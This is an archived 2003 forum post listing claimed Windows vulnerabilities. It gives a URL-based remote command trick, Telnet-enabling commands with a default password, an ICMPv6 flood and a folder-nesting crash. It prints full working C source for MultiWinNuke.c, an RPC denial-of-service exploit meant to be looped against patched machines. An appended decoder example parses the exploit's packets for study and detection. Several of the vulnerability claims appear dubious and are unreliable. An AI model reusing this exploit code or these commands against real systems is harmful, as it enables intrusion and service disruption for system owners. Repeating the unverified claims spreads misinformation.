
Windows Exploits

Posted: Sun Jun 08, 2003 8:57 pm
by Red Squirrel
Now, these are the security bugs/vulnerabilities.

**********

The first one is two Windows Server 2003 security vulnerabilities:

1. Windows 2003 Server has a built-in Command Line Interpreter (I don't
know if this service is enabled by default, but I've tested this on 9
systems, and in 7 of them it worked), which means that you can send commands
to it using the HTTP (TCP) method (the web browser) by trying to access the
server on port 19338 like this:

http://admin@<ip>:19338/cmd.cgi?cmd=<EnterCommandHere>

That will cause the server to run the command from the $ROOT$ drive,
which may be C, D, E or any other drive defined by the owner/admin
of the machine.
Note that no username or password is required.

2. Windows 2003 Server has a built-in Telnet service (disabled by default)
that listens for connections on port 3382.
An attacker can exploit the first vulnerability (#1 above) and write these
commands there:

"sc config TlntSvr start= auto"
and then:
"net start TlntSvr"

Then the attacker has FULL access to the system.
Only a password is required, and because I've just enabled this service,
the password is also set to the default -
Password: tlntadmn

Note that if this service is already enabled, the password will be wrong
(only if the system admin changed it).
If that service is already enabled with another password, the attacker can
open a sharing service or any other service that can give him easy
access to the system.

**********

The second one is Windows NT (2000/XP/2003) ICMPv6 Flooding.
This little Denial of Service attack works just like an ICMP flood, but it
uses the Ping6 tool (on an IPv6-enabled Windows OS or an IPv6-enabled *nix OS).
This attack is also good because Microsoft's Internet Connection Firewall
is unable to block IPv6 traffic.
This is maybe a slow attack but effective; it also depends on the
attacker's and victim's bandwidth.
An exploit for this can be easily made, and I am working on one.


**********

This bug will make Windows XP (all editions) crash.
Create 122 folders one inside the other, naming them with one character
(like '1' or '0'). Now go to the one before the last dir and right-click the
last folder. Hover the mouse over the popped-up menu and the system will crash.
Stupid one, but it does crash the system.


**********

This is an upgraded exploit which will DoS and crash a remote machine using
the WinNuke.c exploit that exploits the Microsoft Windows RPC Service Denial
of Service Vulnerability.
I've discovered that you can STILL DoS and crash it even if it's patched
(with an official M$ patch) against it, by simply nuking it a lot of times,
and fast.
This is the exploit (MultiWinNuke.c a.k.a. FixedWinNuke.c):

### Start MultiWinNuke.c ###

/*
 * Microsoft Windows NT RPC Service Denial of Service Vulnerability
 *
 * Original Code By Lion @ http://www.cnhonker.com
 * Upgraded By Trancer @ http://BinaryVision.tech.nu
 *
 * I have noticed that even after a Windows NT system is patched against this
 * vulnerability with an official M$ update, an attacker can still DoS that
 * system if he activates this exploit a lot of times, fast.
 * So I've upgraded the exploit by looping it and letting you control the
 * number of times you want to nuke a system
 * (with a patched 2000/XP, 250-400 times is recommended).
 *
 * That's it. enjoy :-)
 */

#include <winsock2.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#pragma comment(lib, "ws2_32.lib")

/* DCE/RPC bind PDU (72 bytes) followed by the start of a request PDU whose
 * header declares a much larger fragment than this buffer contains; the
 * filler sends below supply the rest. */
char sendcode1[] =
"\x05\x00\x0b\x03\x10\x00\x00\x00\x48\x00\x00\x00\x02\x00\x00\x00"
"\xd0\x16\xd0\x16\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00"
"\x60\x9e\xe7\xb9\x52\x3d\xce\x11\xaa\xa1\x00\x00\x69\x01\x29\x3f"
"\x02\x00\x02\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00"
"\x2b\x10\x48\x60\x02\x00\x00\x00\x05\x00\x00\x01\x10\x00\x00\x00"
"\xd0\x16\x00\x00\x8f\x00\x00\x00\x20\x27\x01\x00\x00\x00\x02\x00"
"\xf0\x00\x00\x00\x00\x00\x00\x00\xf0\x00\x00\x00";

/* Remaining stub data and fragment headers; each is followed by filler bytes. */
char sendcode2[] =
"\x88\x13\x00\x00\x00\x00\x00\x00\x88\x13\x00\x00";

char sendcode3[] =
"\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00";

char sendcode4[] =
"\xfe\xff\x00\x00\x00\x00\x00\x00\xfe\xff\x00\x00\x3d\x3d\x3d\x3d"
"\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d"
"\x05\x00\x00\x00\x10\x00\x00\x00\xd0\x16\x00\x00\x8f\x00\x00\x00"
"\x50\x10\x01\x00\x00\x00\x02\x00";

char sendcode5[] =
"\x05\x00\x00\x00\x10\x00\x00\x00\xd0\x16\x00\x00\x8f\x00\x00\x00"
"\x80\xf9\x00\x00\x00\x00\x02\x00";

char sendcode6[] =
"\x05\x00\x00\x00\x10\x00\x00\x00\xd0\x16\x00\x00\x8f\x00\x00\x00"
"\xb0\xe2\x00\x00\x00\x00\x02\x00";

char sendcode7[] =
"\x05\x00\x00\x02\x10\x00\x00\x00\x60\x15\x00\x00\x8f\x00\x00\x00"
"\x60\x15\x00\x00\x00\x00\x02\x00";

char sendcode8[] =
"\x00\x00\x01\x10\x00\x00\x00\x00\x00\x00\x01\x10\x00\x00";

int main(int argc, char *argv[])
{
    WSADATA wsaData;
    WORD wVersionRequested;
    struct hostent *pTarget;
    struct sockaddr_in sock;
    char *targetip;
    int port, bufsize, times, i;
    SOCKET s;
    char buffer[20480];

    printf("======================= Windows NT Multi RPC Nuke V0.12 ======================\n");
    printf("=============== Original Code By Lion @ http://www.cnhonker.com ===============\n");
    printf("============= Upgraded By Trancer @ http://BinaryVision.tech.nu ==============\n\n");

    if (argc < 2)
    {
        printf("Usage:\n");
        printf(" %s <TargetIP> <TargetPort> <BufferSize> <Times>\n", argv[0]);
        printf("Example: %s 198.167.0.1 135 512 250\n", argv[0]);
        printf("PS:\n");
        printf(" If target is XP, try 2 times.\n");
        exit(1);
    }

    wVersionRequested = MAKEWORD(1, 1);
    if (WSAStartup(wVersionRequested, &wsaData) != 0) return -1;

    targetip = argv[1];
    port = 135;                         /* RPC endpoint mapper */
    if (argc >= 3) port = atoi(argv[2]);
    bufsize = 512;                      /* accepted on the command line; the send sizes below are fixed */
    if (argc >= 4) bufsize = atoi(argv[3]);
    times = 1;                          /* number of connections to nuke the target with */
    if (argc >= 5) times = atoi(argv[4]);

    printf("Resolving hostname...\n");
    if ((pTarget = gethostbyname(targetip)) == NULL)
    {
        printf("Resolve of %s failed, please try again.\n", targetip);
        WSACleanup();
        exit(1);
    }

    memset(&sock, 0, sizeof(sock));
    memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
    sock.sin_family = AF_INET;
    sock.sin_port = htons((USHORT)port);

    /* One TCP connection per nuke; the socket is closed at the end of each pass
     * so repeated runs do not leak handles. */
    for (i = 0; i < times; i++)
    {
        s = socket(AF_INET, SOCK_STREAM, 0);
        if (s == INVALID_SOCKET)
        {
            printf("Socket error!\n");
            WSACleanup();
            exit(1);
        }

        printf("Connecting...\n");
        if (connect(s, (struct sockaddr *)&sock, sizeof(sock)))
        {
            printf("Couldn't connect to host.\n");
            closesocket(s);
            WSACleanup();
            exit(1);
        }

        printf("Connected!...\n");
        printf("Sending packets...\n");
        if (send(s, sendcode1, sizeof(sendcode1) - 1, 0) == -1)
        {
            printf("Error sending nuke packets\n");
            closesocket(s);
            WSACleanup();
            exit(1);
        }

        memset(buffer, '\x41', 240);
        send(s, buffer, 240, 0);

        send(s, sendcode2, sizeof(sendcode2) - 1, 0);
        memset(buffer, '\x42', 5000);
        send(s, buffer, 5000, 0);

        send(s, sendcode3, sizeof(sendcode3) - 1, 0);
        memset(buffer, '\x43', 512);
        send(s, buffer, 512, 0);

        send(s, sendcode4, sizeof(sendcode4) - 1, 0);
        memset(buffer, '\x44', 20480);
        send(s, buffer, 20480, 0);

        memset(buffer, '\x44', 5000);
        send(s, buffer, 5000, 0);

        send(s, sendcode5, sizeof(sendcode5) - 1, 0);
        memset(buffer, '\x45', 5000);
        send(s, buffer, 5000, 0);

        send(s, sendcode6, sizeof(sendcode6) - 1, 0);
        memset(buffer, '\x46', 5000);
        send(s, buffer, 5000, 0);

        send(s, sendcode7, sizeof(sendcode7) - 1, 0);
        memset(buffer, '\x47', 5000);
        send(s, buffer, 5000, 0);

        send(s, sendcode8, sizeof(sendcode8) - 1, 0);
        memset(buffer, '\x48', 5000);
        send(s, buffer, 5000, 0);

        closesocket(s);
    }

    if (times < 2)
    {
        printf("Nuked! If target is XP, try again!\n");
    }
    else
    {
        printf("%s was nuked %d times\n", targetip, times);
    }

    WSACleanup();
    return 0;
}

### End MultiWinNuke.c ###

Oh, and don't give me credit for this; it's someone else who found these at one digital hangout (found in our top sites).

Archived topic from Iceteks, old topic ID:845, old post ID:7340
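Added example, not part of the original post or of Lion's or Trancer's code: a small decoder for the DCE/RPC connection-oriented PDU headers that MultiWinNuke.c puts on the wire. The byte buffer is the post's `sendcode1` with its hex escapes restored; the field layout follows the DCE 1.1 RPC connection-oriented PDU format (16-byte common header, bind context list, request alloc hint/context id/opnum), and the function and struct names are this example's own. It sends nothing; it only shows what the first `send()` of the exploit contains: a bind to one interface, followed by a request whose header sets only the first-fragment flag and declares a 5840-byte fragment of which just 36 bytes are in this buffer (the exploit's later filler sends provide the rest).

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* The 108 bytes of sendcode1 from MultiWinNuke.c (hex escapes restored):
 * a 72-byte bind PDU followed by the first 36 bytes of a request PDU. */
static const uint8_t nuke_bind[] =
    "\x05\x00\x0b\x03\x10\x00\x00\x00\x48\x00\x00\x00\x02\x00\x00\x00"
    "\xd0\x16\xd0\x16\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00"
    "\x60\x9e\xe7\xb9\x52\x3d\xce\x11\xaa\xa1\x00\x00\x69\x01\x29\x3f"
    "\x02\x00\x02\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00"
    "\x2b\x10\x48\x60\x02\x00\x00\x00\x05\x00\x00\x01\x10\x00\x00\x00"
    "\xd0\x16\x00\x00\x8f\x00\x00\x00\x20\x27\x01\x00\x00\x00\x02\x00"
    "\xf0\x00\x00\x00\x00\x00\x00\x00\xf0\x00\x00\x00";
static const size_t nuke_bind_len = sizeof(nuke_bind) - 1;   /* drop the literal's NUL */

#define RPC_HDR_LEN 16
enum { RPC_PTYPE_REQUEST = 0, RPC_PTYPE_BIND = 11 };
enum { RPC_PFC_FIRST_FRAG = 0x01, RPC_PFC_LAST_FRAG = 0x02 };

typedef struct { uint8_t ver_major, ver_minor, ptype, pflags; uint16_t frag_len, auth_len; uint32_t call_id; } rpc_hdr;
typedef struct { uint16_t max_xmit, max_recv; uint8_t n_ctx; char iface_uuid[37]; uint16_t iface_major, iface_minor; char xfer_uuid[37]; } rpc_bind;
typedef struct { uint32_t alloc_hint; uint16_t ctx_id, opnum; } rpc_req;
typedef struct {
    int ok;                 /* 1 when both PDUs decoded */
    rpc_hdr bind_hdr, req_hdr;
    rpc_bind bind;
    rpc_req req;
    size_t req_present;     /* bytes of the request fragment actually in the buffer */
} nuke_summary;

static uint16_t le16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t le32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Common 16-byte header of the PDU starting at buf[off]. Returns -1 if the
 * header is truncated or the major version is not 5. */
int rpc_parse_hdr(const uint8_t *buf, size_t len, size_t off, rpc_hdr *h) {
    if (off > len || len - off < RPC_HDR_LEN) return -1;
    const uint8_t *p = buf + off;
    if (p[0] != 5) return -1;
    h->ver_major = p[0]; h->ver_minor = p[1]; h->ptype = p[2]; h->pflags = p[3];
    h->frag_len = le16(p + 8); h->auth_len = le16(p + 10); h->call_id = le32(p + 12);
    return 0;
}

/* How much of the fragment declared at buf[off] is really present: a sender
 * that declares more than it writes must deliver the remainder in later writes. */
size_t rpc_frag_present(const uint8_t *buf, size_t len, size_t off) {
    rpc_hdr h;
    if (rpc_parse_hdr(buf, len, off, &h) != 0) return 0;
    size_t avail = len - off;
    return avail < h.frag_len ? avail : h.frag_len;
}

/* DCE UUIDs travel with the first three fields little-endian, the rest as-is. */
void rpc_uuid_to_str(const uint8_t *u, char out[37]) {
    snprintf(out, 37, "%08x-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x",
             (unsigned)le32(u), (unsigned)le16(u + 4), (unsigned)le16(u + 6),
             u[8], u[9], u[10], u[11], u[12], u[13], u[14], u[15]);
}

/* First presentation context of a bind PDU: interface UUID + version, transfer syntax UUID. */
int rpc_parse_bind(const uint8_t *buf, size_t len, size_t off, rpc_bind *b) {
    rpc_hdr h;
    if (rpc_parse_hdr(buf, len, off, &h) != 0 || h.ptype != RPC_PTYPE_BIND) return -1;
    if (len - off < 72) return -1;          /* header + one context with one transfer syntax */
    const uint8_t *p = buf + off + RPC_HDR_LEN;
    b->max_xmit = le16(p); b->max_recv = le16(p + 2); b->n_ctx = p[8];
    rpc_uuid_to_str(p + 16, b->iface_uuid);
    b->iface_major = le16(p + 32); b->iface_minor = le16(p + 34);
    rpc_uuid_to_str(p + 36, b->xfer_uuid);
    return 0;
}

/* Request PDU body: alloc hint, context id, opnum (stub data follows). */
int rpc_parse_request(const uint8_t *buf, size_t len, size_t off, rpc_req *r) {
    rpc_hdr h;
    if (rpc_parse_hdr(buf, len, off, &h) != 0 || h.ptype != RPC_PTYPE_REQUEST) return -1;
    if (len - off < RPC_HDR_LEN + 8) return -1;
    const uint8_t *p = buf + off + RPC_HDR_LEN;
    r->alloc_hint = le32(p); r->ctx_id = le16(p + 4); r->opnum = le16(p + 6);
    return 0;
}

/* Decode both PDUs in sendcode1; the request starts right after the bind fragment. */
nuke_summary decode_nuke_bind(void) {
    nuke_summary s;
    memset(&s, 0, sizeof s);
    if (rpc_parse_hdr(nuke_bind, nuke_bind_len, 0, &s.bind_hdr) != 0 ||
        rpc_parse_bind(nuke_bind, nuke_bind_len, 0, &s.bind) != 0) return s;
    size_t next = s.bind_hdr.frag_len;
    if (rpc_parse_hdr(nuke_bind, nuke_bind_len, next, &s.req_hdr) != 0 ||
        rpc_parse_request(nuke_bind, nuke_bind_len, next, &s.req) != 0) return s;
    s.req_present = rpc_frag_present(nuke_bind, nuke_bind_len, next);
    s.ok = 1;
    return s;
}

int main(void) {
    nuke_summary s = decode_nuke_bind();
    if (!s.ok) { puts("decode failed"); return 1; }
    printf("bind:    ptype %u flags 0x%02x frag_len %u call_id %u\n",
           s.bind_hdr.ptype, s.bind_hdr.pflags, s.bind_hdr.frag_len, (unsigned)s.bind_hdr.call_id);
    printf("         interface %s v%u.%u, transfer syntax %s, max frag %u\n",
           s.bind.iface_uuid, s.bind.iface_major, s.bind.iface_minor, s.bind.xfer_uuid, s.bind.max_xmit);
    printf("request: flags 0x%02x call_id %u opnum %u alloc_hint %u\n",
           s.req_hdr.pflags, (unsigned)s.req_hdr.call_id, s.req.opnum, (unsigned)s.req.alloc_hint);
    printf("         header declares %u bytes, %zu present in this buffer\n",
           s.req_hdr.frag_len, s.req_present);
    return 0;
}
```

The same header parser, pointed at a capture of port 135 traffic, is enough to flag the pattern the exploit relies on: a request fragment whose declared length far exceeds what arrives in one write, with the first-fragment flag set and the last-fragment flag clear.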